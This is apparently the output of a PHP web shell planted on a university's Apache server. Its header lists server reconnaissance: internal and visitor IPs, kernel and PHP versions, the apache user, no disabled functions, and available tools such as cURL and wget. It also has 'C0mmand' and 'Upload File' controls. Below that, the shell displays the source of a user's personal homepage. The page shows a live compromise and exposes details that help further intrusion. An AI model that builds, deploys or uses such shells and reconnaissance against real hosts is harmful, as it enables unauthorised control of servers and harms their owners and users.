Server IP : 172.16.15.8 / Your IP : 52.15.37.74 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/asbright/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html> <head> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="styling.css"> <title>Andrew Bright's Homepage </title> </head> <body style="background-image: url('background.jpg'); background-repeat: no-repeat; background-position: center;"> <h1> Welcome To Andrew Bright's Homepage </h1> <?php include("navbar.php"); ?> <br/> </body> <footer style = "float: left; text-align: none; color: white; position: fixed; left: 0px; bottom: 0px; height:30px; width:100%;"> This is the end. </footer> </html>